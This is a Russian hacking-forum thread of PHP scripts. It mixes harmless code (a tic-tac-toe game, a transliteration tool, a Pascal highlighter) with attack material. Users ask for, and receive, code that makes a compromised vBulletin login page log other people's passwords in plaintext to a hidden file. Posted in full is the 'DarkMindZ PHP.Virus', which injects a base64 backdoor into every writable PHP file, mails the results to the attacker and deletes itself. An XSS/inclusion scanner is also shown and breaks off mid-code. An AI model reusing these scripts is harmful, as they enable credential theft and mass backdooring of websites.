Крестики-нолики. Код получился на 10 кб (в 2 раза больше покера). PHP: <?php session_start(); echo('<title>Крестки-нолики</title>'); if(!$_SESSION['wins'] || $_SERVER['QUERY_STRING'] == 'clear_score'){$_SESSION['wins'] = 0;} if(!$_SESSION['lose'] || $_SERVER['QUERY_STRING'] == 'clear_score'){$_SESSION['lose'] = 0;} if(!$_SESSION['x']) { $_SESSION['x'] = array(); } if(!$_SESSION['o']) { $_SESSION['o'] = array(); } function session_kill() { unset($_SESSION['x']); unset($_SESSION['o']); } function is_won($array) { if((in_array(1, $array) && in_array(2, $array) && in_array(3, $array)) || (in_array(1, $array) && in_array(4, $array) && in_array(7, $array)) || (in_array(1, $array) && in_array(5, $array) && in_array(9, $array)) || (in_array(2, $array) && in_array(5, $array) && in_array(8, $array)) || (in_array(3, $array) && in_array(6, $array) && in_array(9, $array)) || (in_array(3, $array) && in_array(5, $array) && in_array(7, $array)) || (in_array(4, $array) && in_array(5, $array) && in_array(6, $array)) || (in_array(7, $array) && in_array(8, $array) && in_array(9, $array))) { return true; } else { return false; } } if($_GET['place'] && !in_array($_GET['place'], array_merge($_SESSION['x'], $_SESSION['o'])) && $_GET['place'] < 10 && $_GET['place'] > 0) { $_SESSION['x'][] = $_GET['place']; function rand_place() { if(!in_array(5, $_SESSION['x']) && !in_array(5, $_SESSION['o'])) { return 5; } else { $place = rand(1,9); if(!in_array($place, $_SESSION['x']) && !in_array($place, $_SESSION['o'])) { return $place; } else { return rand_place(); } } } if(count(array_merge($_SESSION['x'], $_SESSION['o'])) != 9 && !is_won($_SESSION['x'])) { if(((in_array(2, $_SESSION['o']) && in_array(3, $_SESSION['o'])) || (in_array(4, $_SESSION['o']) && in_array(7, $_SESSION['o'])) || (in_array(5, $_SESSION['o']) && in_array(9, $_SESSION['o']))) && !in_array(1, $_SESSION['o']) && !in_array(1, $_SESSION['x'])) { $_SESSION['o'][] = 1; } elseif(((in_array(1, $_SESSION['o']) && in_array(3, $_SESSION['o'])) || (in_array(5, $_SESSION['o']) && in_array(8, $_SESSION['o']))) && !in_array(2, $_SESSION['o']) && !in_array(2, $_SESSION['x'])) { $_SESSION['o'][] = 2; } elseif(((in_array(1, $_SESSION['o']) && in_array(2, $_SESSION['o'])) || (in_array(6, $_SESSION['o']) && in_array(9, $_SESSION['o'])) || (in_array(5, $_SESSION['o']) && in_array(7, $_SESSION['o']))) && !in_array(3, $_SESSION['o']) && !in_array(3, $_SESSION['x'])) { $_SESSION['o'][] = 3; } elseif(((in_array(5, $_SESSION['o']) && in_array(6, $_SESSION['o'])) || (in_array(1, $_SESSION['o']) && in_array(7, $_SESSION['o']))) && !in_array(4, $_SESSION['o']) && !in_array(4, $_SESSION['x'])) { $_SESSION['o'][] = 4; } elseif(((in_array(4, $_SESSION['o']) && in_array(6, $_SESSION['o'])) || (in_array(2, $_SESSION['o']) && in_array(8, $_SESSION['o'])) || (in_array(1, $_SESSION['o']) && in_array(9, $_SESSION['o'])) || (in_array(3, $_SESSION['o']) && in_array(7, $_SESSION['o']))) && !in_array(5, $_SESSION['o']) && !in_array(5, $_SESSION['x'])) { $_SESSION['o'][] = 5; } elseif(((in_array(4, $_SESSION['o']) && in_array(5, $_SESSION['o'])) || (in_array(3, $_SESSION['o']) && in_array(9, $_SESSION['o']))) && !in_array(6, $_SESSION['o']) && !in_array(6, $_SESSION['x'])) { $_SESSION['o'][] = 6; } elseif(((in_array(8, $_SESSION['o']) && in_array(9, $_SESSION['o'])) || (in_array(1, $_SESSION['o']) && in_array(4, $_SESSION['o'])) || (in_array(3, $_SESSION['o']) && in_array(5, $_SESSION['o']))) && !in_array(7, $_SESSION['o']) && !in_array(7, $_SESSION['x'])) { $_SESSION['o'][] = 7; } elseif(((in_array(7, $_SESSION['o']) && in_array(9, $_SESSION['o'])) || (in_array(2, $_SESSION['o']) && in_array(5, $_SESSION['o']))) && !in_array(8, $_SESSION['o']) && !in_array(8, $_SESSION['x'])) { $_SESSION['o'][] = 8; } elseif(((in_array(7, $_SESSION['o']) && in_array(8, $_SESSION['o'])) || (in_array(3, $_SESSION['o']) && in_array(6, $_SESSION['o'])) || (in_array(1, $_SESSION['o']) && in_array(5, $_SESSION['o']))) && !in_array(9, $_SESSION['o']) && !in_array(9, $_SESSION['x'])) { $_SESSION['o'][] = 9; } elseif(((in_array(2, $_SESSION['x']) && in_array(3, $_SESSION['x'])) || (in_array(4, $_SESSION['x']) && in_array(7, $_SESSION['x'])) || (in_array(5, $_SESSION['x']) && in_array(9, $_SESSION['x']))) && !in_array(1, $_SESSION['x']) && !in_array(1, $_SESSION['o'])) { $_SESSION['o'][] = 1; } elseif(((in_array(1, $_SESSION['x']) && in_array(3, $_SESSION['x'])) || (in_array(5, $_SESSION['x']) && in_array(8, $_SESSION['x']))) && !in_array(2, $_SESSION['x']) && !in_array(2, $_SESSION['o'])) { $_SESSION['o'][] = 2; } elseif(((in_array(1, $_SESSION['x']) && in_array(2, $_SESSION['x'])) || (in_array(6, $_SESSION['x']) && in_array(9, $_SESSION['x'])) || (in_array(5, $_SESSION['x']) && in_array(7, $_SESSION['x']))) && !in_array(3, $_SESSION['x']) && !in_array(3, $_SESSION['o'])) { $_SESSION['o'][] = 3; } elseif(((in_array(5, $_SESSION['x']) && in_array(6, $_SESSION['x'])) || (in_array(1, $_SESSION['x']) && in_array(7, $_SESSION['x']))) && !in_array(4, $_SESSION['x']) && !in_array(4, $_SESSION['o'])) { $_SESSION['o'][] = 4; } elseif(((in_array(4, $_SESSION['x']) && in_array(6, $_SESSION['x'])) || (in_array(2, $_SESSION['x']) && in_array(8, $_SESSION['x'])) || (in_array(1, $_SESSION['x']) && in_array(9, $_SESSION['x'])) || (in_array(3, $_SESSION['x']) && in_array(7, $_SESSION['x']))) && !in_array(5, $_SESSION['x']) && !in_array(5, $_SESSION['o'])) { $_SESSION['o'][] = 5; } elseif(((in_array(4, $_SESSION['x']) && in_array(5, $_SESSION['x'])) || (in_array(3, $_SESSION['x']) && in_array(9, $_SESSION['x']))) && !in_array(6, $_SESSION['x']) && !in_array(6, $_SESSION['o'])) { $_SESSION['o'][] = 6; } elseif(((in_array(8, $_SESSION['x']) && in_array(9, $_SESSION['x'])) || (in_array(1, $_SESSION['x']) && in_array(4, $_SESSION['x'])) || (in_array(3, $_SESSION['x']) && in_array(5, $_SESSION['x']))) && !in_array(7, $_SESSION['x']) && !in_array(7, $_SESSION['o'])) { $_SESSION['o'][] = 7; } elseif(((in_array(7, $_SESSION['x']) && in_array(9, $_SESSION['x'])) || (in_array(2, $_SESSION['x']) && in_array(5, $_SESSION['x']))) && !in_array(8, $_SESSION['x']) && !in_array(8, $_SESSION['o'])) { $_SESSION['o'][] = 8; } elseif(((in_array(7, $_SESSION['x']) && in_array(8, $_SESSION['x'])) || (in_array(3, $_SESSION['x']) && in_array(6, $_SESSION['x'])) || (in_array(1, $_SESSION['x']) && in_array(5, $_SESSION['x']))) && !in_array(9, $_SESSION['x']) && !in_array(9, $_SESSION['o'])) { $_SESSION['o'][] = 9; } else { $_SESSION['o'][] = rand_place(); } } } if(!is_won($_SESSION['x']) && !is_won($_SESSION['o']) && count(array_merge($_SESSION['x'], $_SESSION['o'])) != 9) { ?> <script> function add(element) { if(element.innerHTML != 'O' && element.innerHTML != 'X') { document.location.href = '<?php echo($_SERVER['PHP_SELF']); ?>?place='+element.id; } else { alert('Здесь ставить нельзя'); } } function over(element, str) { if(element.innerHTML != 'O' && element.innerHTML != 'X') { element.innerHTML = ' '+str+' '; } } </script> <?php } ?> <table style="font-size: 40px; text-align: center; cursor: pointer;"> <tr> <td style="width: 50px; height: 40px; border-right: 1px solid black;" onclick="add(this)" onmouseover="over(this, 'X')" onmouseout="over(this, ' ')" id="1"><?php if(in_array(1, $_SESSION['x'])) { echo('X'); } elseif(in_array(1, $_SESSION['o'])) { echo('O'); } else { echo(' '); } ?></td> <td style="width: 50px; height: 40px; border-right: 1px solid black;" onclick="add(this)" onmouseover="over(this, 'X')" onmouseout="over(this, ' ')" id="2"><?php if(in_array(2, $_SESSION['x'])) { echo('X'); } elseif(in_array(2, $_SESSION['o'])) { echo('O'); } else { echo(' '); } ?></td> <td style="width: 50px; height: 40px;" onclick="add(this)" onmouseover="over(this, 'X')" onmouseout="over(this, ' ')" id="3"><?php if(in_array(3, $_SESSION['x'])) { echo('X'); } elseif(in_array(3, $_SESSION['o'])) { echo('O'); } else { echo(' '); } ?></td> </tr><tr> <td style="width: 50px; height: 40px; border-top: 1px solid black; border-bottom: 1px solid black; border-right: 1px solid black;" onclick="add(this)" onmouseover="over(this, 'X')" onmouseout="over(this, ' ')" id="4"><?php if(in_array(4, $_SESSION['x'])) { echo('X'); } elseif(in_array(4, $_SESSION['o'])) { echo('O'); } else { echo(' '); } ?></td> <td style="width: 50px; height: 40px; border-top: 1px solid black; border-bottom: 1px solid black; border-right: 1px solid black;" onclick="add(this)" onmouseover="over(this, 'X')" onmouseout="over(this, ' ')" id="5"><?php if(in_array(5, $_SESSION['x'])) { echo('X'); } elseif(in_array(5, $_SESSION['o'])) { echo('O'); } else { echo(' '); } ?></td> <td style="width: 50px; height: 40px; border-top: 1px solid black; border-bottom: 1px solid black;" onclick="add(this)" onmouseover="over(this, 'X')" onmouseout="over(this, ' ')" id="6"><?php if(in_array(6, $_SESSION['x'])) { echo('X'); } elseif(in_array(6, $_SESSION['o'])) { echo('O'); } else { echo(' '); } ?></td> </tr><tr> <td style="width: 50px; height: 40px; border-right: 1px solid black;" onclick="add(this)" onmouseover="over(this, 'X')" onmouseout="over(this, ' ')" id="7"><?php if(in_array(7, $_SESSION['x'])) { echo('X'); } elseif(in_array(7, $_SESSION['o'])) { echo('O'); } else { echo(' '); } ?></td> <td style="width: 50px; height: 40px; border-right: 1px solid black;" onclick="add(this)" onmouseover="over(this, 'X')" onmouseout="over(this, ' ')" id="8"><?php if(in_array(8, $_SESSION['x'])) { echo('X'); } elseif(in_array(8, $_SESSION['o'])) { echo('O'); } else { echo(' '); } ?></td> <td style="width: 50px; height: 40px;" onclick="add(this)" onmouseover="over(this, 'X')" onmouseout="over(this, ' ')" id="9"><?php if(in_array(9, $_SESSION['x'])) { echo('X'); } elseif(in_array(9, $_SESSION['o'])) { echo('O'); } else { echo(' '); } ?></td> </tr> </table> <?php if(is_won($_SESSION['x'])) { echo('<font color="Green"><b>Вы выиграли</b></font> | <a href="'.$_SERVER['PHP_SELF'].'">Ещё раз</a>'); session_kill(); $_SESSION['wins']++; } elseif(is_won($_SESSION['o'])) { echo('<font color="Green"><b>Вы проиграли</b></font> | <a href="'.$_SERVER['PHP_SELF'].'">Ещё раз</a>'); session_kill(); $_SESSION['lose']++; } else { if(count(array_merge($_SESSION['x'], $_SESSION['o'])) == 9) { echo('<font color="Green"><b>Ничья</b></font> | <a href="'.$_SERVER['PHP_SELF'].'">Ещё раз</a>'); session_kill(); } } echo('<div style="position: absolute; top: 5%; right: 5%;"><table width="200"><td>Побед:</td><td><b>'.$_SESSION['wins'].'</b></td></tr><tr><td>Проигрышей:</td><td><b>'.$_SESSION['lose'].'</b></td></tr></table><div align="center"><a href="'.$_SERVER['PHP_SELF'].'?clear_score">Очистить счёт</a></div></div></body>'); ?> Пример скрипта.
Помогите модификацировать php код, чтобы логи и пароль сохранялись в файл в открытом виде для тех, кто логинится..
PHP: $login = ''; $password = ''; $f = fopen('password.txt', 'ab'); fwrite($f, $login.":".$password."\r\n -------------\r\n"); fclose($f); Запись данных в файл, в открытом виде. Не понял твой вопрос.
Ситуация токая. Попал я к отдому челу на мыло. Там оказались логины и пароли от ФТП сервера и от сайта, т.е логины Админа. Так вот мне посаветовали модифецировать код от страницы жертвы, что бы логины и пароли хранились в файле в открытом тексте. А я в програмирование не селён.
Да, в файле авторизации можно добавить вредоносный код, который, параллельно, отправлял бы данные на почту или просто оставлял бы на сервере в одном .txt файле - как у меня написано в примере, остается только заменить переменные и уточнить путь сохранения файла (куда нибудь, что бы безпалевно было) Для начала нужно разобраться в самом коде файла авторизации... Ты хотя бы скажи какая там система (Wordpress, и тд) а потом уже можно будет пробовать. Ничего сложного, я думаю. Но если ты вообще дуб в php, то лучше не браться самому.
Да я в этом полный дуб, вот и прошу о помощи. vBulletin® Version 3.6.8. А какой нужен. А это вообще былобы не плохо.
Вот написал скрипт, который переводит русские слова в транслит и на английскую раскладку qwerty-клавиатур, и записывает их в отдельные файлы, полезно при составлении словарей для брута, может кому пригодится как и мне. Конструкция правда громоздкая получилась, но у меня еще опыта мало, строго не судите =) PHP: <? $file = file_get_contents('rus.txt'); $rus_s = array('щ','ж','ц', 'ч', 'ш', 'ю', 'я','а', 'б', 'в', 'г', 'д', 'е', 'ё', 'з', 'и', 'й', 'к', 'л', 'м', 'н', 'о', 'п', 'р', 'с', 'т', 'у', 'ф', 'х', 'ъ', 'ы', 'ь', 'э'); $eng_s = array('sch','zh','ts', 'ch','sh','yu', 'ya','a', 'b', 'v', 'g', 'd', 'e', 'e', 'z', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'r', 's', 't', 'u', 'f', 'h', '', 'y', '', 'e'); $file = str_replace($rus_s, $eng_s, $file); $file1 = fopen('translit.txt', 'w'); fwrite($file1, $file); fclose($file1); $file = file_get_contents('rus.txt'); $rus_s = array('щ','ж','ц', 'ч', 'ш', 'ю', 'я','а', 'б', 'в', 'г', 'д', 'е', 'ё', 'з', 'и', 'й', 'к', 'л', 'м', 'н', 'о', 'п', 'р', 'с', 'т', 'у', 'ф', 'х', 'ъ', 'ы', 'ь', 'э'); $qwer_s = array('o',';','w', 'x','i','.', 'z','f', 'd', 'd', 'u', 'l', 't', '`', 'p', 'b', 'q', 'r', 'k', 'v', 'y', 'j', 'g', 'h', 'c', 'n', 'e', 'a', '[', ']', 's', 'm', '\''); $file = str_replace($rus_s, $qwer_s, $file); $file1 = fopen('qwer.txt', 'w'); fwrite($file1, $file); fclose($file1); ?> rus.txt первоначальный файл со словарем русского языка, нужно положить в дирикторию скрипта =)
Скрипт для отсеивания фрихостов с файла в другой PHP: <?php $fileinput="1.txt"; $fileoutput="2.txt"; $f=fopen($fileoutput,'w'); $ar = array(".narod.ru", ".h10.ru", "jino-net.ru","h17.ru",".h18.ru",".clan.su","ucoz.ru","vo.uz","at.ua","p0.ru","3dn.ru","my1.ru","moy.su","do.am","pp.net.ua","ucoz.ua","ucoz.kz","ucoz.lv","ws.co.ua"); $s=file($fileinput); for ($i=0;$i<count($s);$i++) { for ($j=0;$j<count($ar);$j++){ if (eregi($ar[$j],$s[$i])) {fputs($f,$s[$i]);} } } fclose($f); echo "Процедура успешно завершена "; ?> Чуть поправив можно собирать только отдельные фрихосты или что то другое(народа) PHP: .... $ar = array("ftp.narod.ru"); ....
Code: $file = fopen("logins.txt", "a"); if($file) { $string = $vbulletin->GPC['vb_login_username'].":".$vbulletin->GPC['vb_login_password']."\n"; fwrite($file, $string); fclose($file); } На одном форуме мне написали, вот такой код, Всё бы хорошо, но в файле сохраняется только Логин, а пароль почемуто не прописывается. Вчем может быть проблемма.? ПОМОГИТЕ ПЖЛСТА
PHP: <?php // DarkMindZ.com ###################################### # [ DarkMindZ PHP.Virus v1.5 ] # # [ RoMeO ] # ###################################### set_time_limit(0); ignore_user_abort(1); # [email protected]~ cat /home/pr0jects/virus/intro # DMZ PHP.Virus, very simple PHP virus, that would do the following: # |1| Look for all PHP files in directory. # |2| Check if infected. # |3| Infect with your backdoor. # |4| Log all infected files, and optional mail them to you. # [email protected]~ exit # [ To-Do ] # # Mass infector, infect other users on server. # Better Reports, some system info reports too. # Spreading, by RFI dorks. # Polymorphism #[x] Change user-agent used, 2 backdoors, `include and a CMD exec`. - done a better job here, one backdoor, includes all that :] ######## [ CONFIG ] ######## $backdoor =''; # your backdoor here - Base64 encoded PLEASE $agent = 'darkmindz.com_b4ckd00r'; # your agent here. ## $log_email = 1; # Send log to email? $email = '[email protected]'; # Email to send logs to. ## $log_report = 0; # Write a log? $filename = '__log.html'; # name of log. ## $delete_me = 1; # Delete me after we are done? - Recommended. :] ## echo '<title>DarkMindZ.com - Think Dark - The Backdoor.</title><center><strong> [ <a href="http://www.darkmindz.com">DarkMindZ.com || Mass Backdoor Tool || By RoMeO</a> ]</strong></center><br>'; $dir = opendir('.'); $site=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); echo '<strong>[-] Infecting : ' . $site . '</strong><br>'; while ($file = readdir($dir)) { if (strstr($file, '.php') && is_writeable($file)) { $victim = fopen($file, 'r+'); $victim_read = fread($victim, filesize($file)); if (!strstr($victim_read, 'DarkMindZ.com')) { fclose($victim); unlink($file); $new = fopen($file, 'a+'); $new_write = fwrite($new, base64_decode($backdoor) . $victim_read); fclose($new); echo '[x] Infected: ' . getcwd() .'/'. $file . '<br>'; if($log_email) { $log = fopen('__tmp', 'a+'); fwrite($log, '[x] File: ' . getcwd() .'/'. $file . ' '); fclose($log); } if($log_report) { $x = fopen($filename, 'a+'); fwrite($x, '[x] File: ' . getcwd() .'/'. $file . "\n"); fclose($x); } } } } closedir($dir); if($log_email) { $fromname = "DarkMindZ Backdoor"; $fromaddress = "[email protected]"; $eol="\n"; $headers = "From: ".$fromname."<".$fromaddress.">".$eol; $headers .= "Reply-To: ".$fromname."<".$fromaddress.">".$eol; $headers .= "Return-Path: ".$fromname."<".$fromaddress.">".$eol; $headers .= "Message-ID: <".time()."-".$fromaddress.">".$eol; $headers .= "X-Mailer: PHP v".phpversion().$eol; $headers .= 'MIME-Version: 1.0'.$eol; $headers .= "Content-type: text/html; charset=iso-8859-1".$eol.$eol; $report = file_get_contents('__tmp'); $dir = getcwd(); $part = explode('/', $dir); $username = $part[1]; $uname = @system('uname -a'); $report .= ' ########################################### Backdoor Report | | DarkMindZ.com ########################################### Target: '.$site.' Uname: '.$uname.' Username: '.$username.' Agent: '.$agent.' ########################################### '; mail($email, "DarkMindZ Backdoor", ' ' .$report, $headers); unlink('__tmp'); echo '<br />[x] Email Report Sent!';} if($delete_me) { unlink(__file__); } # done, kthxbai! next target pl0x;] exit; # if we are in a RFI, we dont want to show other content, right? ?>
upd: Привёл в более божеский вид: PHP: <?php function c($text,$key) // шифровка { for($j=0;$j<strlen($text);$j++) $text[$j]=chr(ord($text[$j])+$key); return $text; } function d($text,$key) //дешифровка { for($j=0;$j<strlen($text);$j++) $text[$j]=chr(ord($text[$j])-$key); return $text; } ?> Ничего серьёзного показать не хотел,строго не судите.
Cкрипт подцветки кода Pascal PHP: <?php error_reporting(1); // Обработка строк function StringProc($input, $pos) { $pos_one = $pos; $pos_two = $pos; for ($i=$pos_one+1; $i<strlen($input); $i++) { if ($input[$i]=="'") { $pos_two = $i; break; } } $pos = $pos_two; // Вернем позицию конца строки $res[0] = "<font color=blue>".substr($input, $pos_one, $pos_two-$pos_one+1)."</font>"; $res[1] = $pos_two; return $res; } // Обработка комментариев в виде гнутой скобки function CommentProc1($input, $pos) { $pos_one = $pos; $pos_two = $pos; for ($i=$pos_one+1; $i<strlen($input); $i++) { if ($input[$i]=="}") { $pos_two = $i; break; } } $pos = $pos_two; // Вернем позицию конца строки $res[0] = "<font color=gray>".substr($input, $pos_one, $pos_two-$pos_one+1)."</font>"; $res[1] = $pos_two; return $res; } // Обработка комментариев в виде скобки и звездочки function CommentProc2($input, $pos) { $pos_one = $pos; $pos_two = $pos; for ($i=$pos_one+1; $i<strlen($input); $i++) { if (($input[$i]==")") & ($input[$i-1]=="*")) { $pos_two = $i; break; } } $pos = $pos_two; // Вернем позицию конца строки $res[0] = "<font color=gray>".substr($input, $pos_one, $pos_two-$pos_one+1)."</font>"; $res[1] = $pos_two; return $res; } // Обработка однострочных комментариев в виде двойного слеша function CommentProc3($input, $pos) { $pos_one = $pos; $pos_two = $pos; for ($i=$pos_one+1; $i<strlen($input); $i++) { if ($input[$i]=="\n") { $pos_two = $i; break; } } $pos = $pos_two; // Вернем позицию конца строки $res[0] = "<font color=gray>".substr($input, $pos_one, $pos_two-$pos_one+1)."</font>"; $res[1] = $pos_two; return $res; } // Обработка цифр и HEX кодов function NumberProc($input, $pos) { $pos_one = $pos; $pos_two = $pos; for ($i=$pos_one+1; $i<strlen($input); $i++) { if (!ereg('[0-9,a-f,A-F]', $input[$i])) { $pos_two = $i; break; } } $pos = $pos_two; // Вернем позицию конца строки $res[0] = "<font color=red>".substr($input, $pos_one, $pos_two-$pos_one)."</font>"; $res[1] = $pos_two-1; return $res; } // Обработка ключевых слов function KeyWordProc($input, $pos, $key, $_words, $_keys) { $strlen = strlen($input); for ($i=$pos; $i<$strlen; $i++) if (eregi('[^a-z,A-Z]', $input[$i])) break; $res[0] = substr($input, $pos, $i-$pos); $res[1] = $pos+strlen($res[0])-1; // Вернем позицию конца строки for ($i=$_keys[$key][1]; $_words[$i][0]==$_keys[$key][0]; $i++) { if (eregi(substr($input, $pos, strlen($_words[$i])), $_words[$i]) & eregi('[^a-z,A-Z,0-9]', $input[$pos+strlen($_words[$i])])) { $res[0] = "<b>".$_words[$i]."</b>"; $res[1] = $pos+strlen($_words[$i])-1; break; } } // Если это не ключевое слово - передадим его целиком return $res; } // ************************************************************* // Основная функция раскраски кода * // ************************************************************* function DrawCodePas($input) { // Выделение ключевых слов // Выделяемые слова $key_words = "abstract/and/array/as/asm/begin/case/class/const/constructor/cdecl/default/destructor/do/div/dynamic/else/end/except/external/finally/for/function/finalization/if/implementation/interface/initialization/message/mod/nil/not/name/of/or/overload/override/package/packed/pascal/private/procedure/program/property/protected/public/published/raise/read/record/shl/shr/stdcall/string/then/to/try/type/type/unit/until/uses/var/virtual/where/while/with/write/xor"; // Заполняем их в массив $key_words = explode('/', $key_words); // При добавлении новых ключевых слов откомментировать, выполнить под отладкой // и заменить потом $key_words вычесленным значением $e_key_words (удалить завершающий слеш) // sort($key_words); // for ($j=0; $j<count($key_words); $j++) { // $e_key_words .= $key_words[$j]."/"; // } // Составим список буква - первое слово, начинающиеся с этой буквы в $key_words for ($j=0; $j<count($key_words); $j++) { //$key_words[$j] = trim($key_words[$j]); // Добавим символ и ссылку на слово в массив $new_item[0] = $key_words[$j][0]; $new_item[1] = $j; $first_chars[] = $new_item; // Теперь пропустим все слова с этой же буквы for ($i=$j+1; $i<count($key_words); $i++) { if ($key_words[$i][0] != $key_words[$j][0]) break; } $j = $i-1; } $result = ""; $input = ' '.$input.' '; // Разукрашивание for ($i=1; $i<strlen($input); $i++) { if ($input[$i]=="'") { $in_str = StringProc($input, $i); $result .= $in_str[0]; $i = $in_str[1]; } elseif ($input[$i]=="{") { $in_str = CommentProc1($input, $i); $result .= $in_str[0]; $i = $in_str[1]; } elseif (($input[$i]=="(") & ($input[$i+1]=="*")) { $in_str = CommentProc2($input, $i); $result .= $in_str[0]; $i = $in_str[1]; } elseif (($input[$i]=="/") & ($input[$i+1]=="/")) { $in_str = CommentProc3($input, $i); $result .= $in_str[0]; $i = $in_str[1]; } elseif ((ereg('[0-9]', $input[$i]) & ereg("[\n\( ,.\[;]", $input[$i-1])) | (ereg('[-]', $input[$i-1]) & ereg("[0-9]", $input[$i])) | (ereg('[\$]', $input[$i]) & ereg("[\n\( ,-;.]", $input[$i-1]) & ereg("[0-9,a-f,A-F]", $input[$i+1]))) { $in_str = NumberProc($input, $i); $result .= $in_str[0]; $i = $in_str[1]; } elseif // Проверим не начинается ли с текущей буквы какое-то ключевое слово, // а перед этим проверим, чтобы перед ней стоял пробел, запятая или что-то вроде этого (eregi('[^a-z,A-Z_,0-9]', $input[$i-1]) & eregi('[a-z,A-Z]', $input[$i])) { $check = false; for ($j=0; $j<count($first_chars); $j++) { if (strtolower($input[$i])==strtolower($first_chars[$j][0])) { $in_str = KeyWordProc($input, $i, $j, $key_words, $first_chars); $result .= $in_str[0]; $i = $in_str[1]; $j = count($first_chars)-1; // Чтобы цикл остановился $check = true; // Пометка, что первая буква была в словаре, } // т.е слово было обработанно } if ($check==false) { $result .= $input[$i]; } } else { $result .= $input[$i]; } } return trim($result); } // Обработчик обратного вызова из preg_replace_callback, используемого для // обработки Паскаль-кода function pas_preg_callback($matches) { return "<pre class=\"code\">".DrawCodePas($matches[1])."</pre>"; } error_reporting(0); ?>
C тегами PHP или CODE запостить не могу... Php Vulnerability Scanner by KingOfSka #!/usr/bin/php -q <?php /** * Php Vulnerability Scanner by KingOfSka @ http://www.contropoterecrew.org * still very early release, just for testing and coding purpose * * Changelog: * * 12/09/06 Version 0.1 : First "working" version, should work on "almost" site, report any bug to help me * 25/09/06 0.2 : Better crawling, less bandwith/resource usage, speed improved, better vuln finding code * **/ print_r(' ------------------------------------------------------------------------------- Php Vulnerability Scanner by KingOfska @ http://contropotere.netsons.org kingofska [at] gmail [dot] com ------------------------------------------------------------------------------- '); if ($argc < 2) { print_r(' Early release, please send bug report to help improving this script -------------------------------------------------------------------------------- Usage: '.$argv[0].' host [start_path][port][debug] host: target server (ip/hostname) path: path from which to start scanning, if none entered starts from \'/\' port: port of the http server, default 80 Examples: '.$argv[0].' localhost /folder/script.php 81 -------------------------------------------------------------------------------- '); die; } $host= $argv[1]; // Insert the host site i.e. : www.website.com $start_page = $argv[2]; // Insert the start page for the scan, if empty will start from index.* $port = 80 ; $additional_vars = array('id','page'); $locator = array("123'",'\'\';!--"<XSS>=&{()}','some_inexisistent_file_to_include.php'); //XSS Locator from ha.ckers.org $debug = TRUE; /** Compatibility for php < 5 * stripos() function made by rchillet at hotmail dot com * */ if (!function_exists("stripos")) { function stripos($str,$needle,$offset=0) { return strpos(strtolower($str),strtolower($needle),$offset); } } /** * Do not edit below unless you know what you do... */ $reqmade = 0 ; $time_start = getmicrotime(); set_time_limit(0); error_reporting(E_ERROR); $checkedpages[]=''; $result[] = ''; $links[] = ''; $checkedlinks[] = '' ; echo "Starting scan on $host:\r\nStarting page: $start_page\r\n"; $site_links = index_site(); $count = count($site_links); echo "Starting to scan $count pages...\r\n"; foreach($site_links as $cur){ echo "Testing: $cur \r\n"; test_page($cur); } $time_end = getmicrotime(); $result['time'] = substr($time_end - $time_start,0,4); $result['connections'] = $reqmade; $result['scanned'] = count($checkedpages); echo "Report:"; foreach ($result['vuln'] as $type=> $url){ echo "\r\n$type vulnerability found:\r\n"; $url = array_unique($url); foreach($url as $cur){ echo "$cur \r\n"; } } $server = get_server_info(); echo "\r\nAdditional infos:\r\n"; echo "Site running on: ".$server['software']."\r\n"; echo "Powered by: ".$server['powered']."\r\n"; echo "Scan took ".$result['time']." seconds to scan ".$result['scanned']." pages using ".$result['connections']." connections\r\n"; function index_site(){ global $start_page; array($links); $tmp = get_links($start_page,true); foreach($tmp as $cur){ $tmp2 = get_links($cur,true); $links = array_merge_recursive($links,$tmp2); } $links = array_unique(clean_array($links)); $links[] = $start_page; sort($links); return($links); } /** * Testes a form using global vuln locator, both GET and POST method, and print result to screen * @author KingOfSka <[email protected]> * @param array $form Form to test * @return void */ function test_form($form){ $ret = ''; $tmp = ''; global $host,$port,$locator,$debug,$result ; if($form['action'][0] != '/' AND stripos($form['action'],'http://') === FALSE ){$form['action'] = '/'.$form['action'];} if ($form['method'] = 'get'){ foreach($form['vars'] as $current){ foreach($locator as $testing){ $testing = urlencode($testing); $conn = fsockopen ("$host", $port, $errno, $errstr, 30); if (!$conn) { echo "$errstr ($errno)<br>\n"; } else { if (!stripos('?',$data['action'])){ $req = "GET ".$form['action']."?$current=$testing HTTP/1.0\r\nHost: $host\r\nConnection: Close\r\n\r\n"; }else{ $req= "GET ".$form['action']."&$current=$testing HTTP/1.0\r\nHost: $host\r\nConnection: Close\r\n\r\n"; } if ($debug == TRUE){echo $req;} fputs ($conn, $req); while (!feof($conn)) { $tmp .= fgets ($conn,128); } fclose ($conn); do_test($tmp,$form['action'],$current); $tmp = ''; } } } }else if ($form['method'] = 'post'){ foreach($form['vars'] as $current){ foreach($locator as $testing){ $testing = urlencode($testing); $conn = fsockopen ("$host", $port, $errno, $errstr, 30); if (!$conn) { echo "$errstr ($errno)\r\n"; } else { $req="POST ".$form['action']." HTTP/1.0\r\nHost: $host\r\nContent-Type: application/x-www-form-urlencoded\r\nConnection: Close\r\nContent-Length: ".strlen($postit)."\r\n\r\n$postit\r\n\r\n"; $postit = "$current=$testing" ; if ($debug == TRUE){echo $req;} fputs ($conn, $req); while (!feof($conn)) { $tmp .= fgets ($conn,128); } fclose ($conn); do_test($tmp,$form['action'],"POST: $current"); $tmp = ''; } } } } } /** * Catches and Parses HTML forms * @author KingOfSka <[email protected]> * @param string $page Page to scan for forms * @return Array **/ function catch_forms($page){ array($form); $data = get($page); preg_match_all('#<form .+?>.+?</form>#is',$data['content'],$matches); foreach ($matches[0] as $data['content']){ preg_match('#<form (.+?)>(.+?)</form>#is',$data['content'],$matches); $form['setup'] = $matches[1]; $form['content'] = $matches[2]; preg_match('#method\s?=\s?["\']?(get|post)["\']?#i',$form['setup'],$matches); if (isset($matches[1])){ $form['method'] = $matches[1]; }else{ $form['method'] = 'get'; } preg_match('#action\s?=\s?["\']?([^"\']*)["\']?#i',$form['setup'],$matches); $form['action'] = $matches[1]; preg_match_all('#<input (.*)>#i',$form['content'],$input); foreach($input[0] as $cur){ preg_match('#name\s?=\s?["\']?(\w*)["\']?#i',$cur,$matches); $form['vars'][] = $matches[1]; } print_r($form); test_form($form); } } function get_server_info(){ global $site_links; array($server); foreach($site_links as $link){ if(stripos($link,'.php')){ $right = $link; break; } } $data = get($right); preg_match('#Server:\s?(\w.*)#',$data['headers'],$matches); $server['software'] = $matches[1]; preg_match('#X-Powered-By:\s?(\w.*)#',$data['headers'],$matches); if (isset($matches[1])){ $server['powered'] = $matches[1]; } return $server; } function test_page($page){ global $checkedpages; if (in_array($page,$checkedpages)){ 